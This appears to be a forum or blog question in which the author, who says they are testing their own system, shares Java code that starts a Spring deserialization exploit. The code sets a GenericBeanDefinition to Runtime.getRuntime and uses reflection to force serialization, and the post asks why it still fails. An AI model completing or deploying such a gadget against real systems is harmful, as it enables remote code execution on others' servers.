To test vulnerabilities in our system I want to create an exploit, which needs to serialize GenericBeanDefinition from spring-beans.
The super class AbstractBeanDefinition has one attribute which is not serializable: constructorArgumentValues.
To hack this I wrote the following code to modify the attribute as transient via reflection:
// create a bean object
GenericBeanDefinition bean = new GenericBeanDefinition();
bean.setBeanClass(Runtime.class);
bean.setFactoryMethodName("getRuntime");
// make constructorArgumentValues transient via reflection
try {
Field field = AbstractBeanDefinition.class.getDeclaredField("constructorArgumentValues");
Field modifiers = Field.class.getDeclaredField("modifiers");
modifiers.setAccessible(true);
modifiers.setInt(field, field.getModifiers() | Modifier.TRANSIENT);
field.setAccessible(true);
field.set(bean, null);
} catch (Exception e) { e.printStackTrace(); }
// serialize it
try (FileOutputStream fileOut = new FileOutputStream("test.ser");
ObjectOutputStream outStream = new ObjectOutputStream(fileOut)) {
outStream.writeObject(bean);
} catch (IOException e) { e.printStackTrace(); }
Unfortunately I get:
java.io.NotSerializableException: org.springframework.beans.factory.config.ConstructorArgumentValues
The snipplet above works fine, when I try it with another simple class:
class MySerializable implements Serializable {
private MyUnserializable myUnserializable = new MyUnserializable();
}
class MyUnserializable {
}
I don't see the problem here. Thanks for any help!
Aucun commentaire:
Enregistrer un commentaire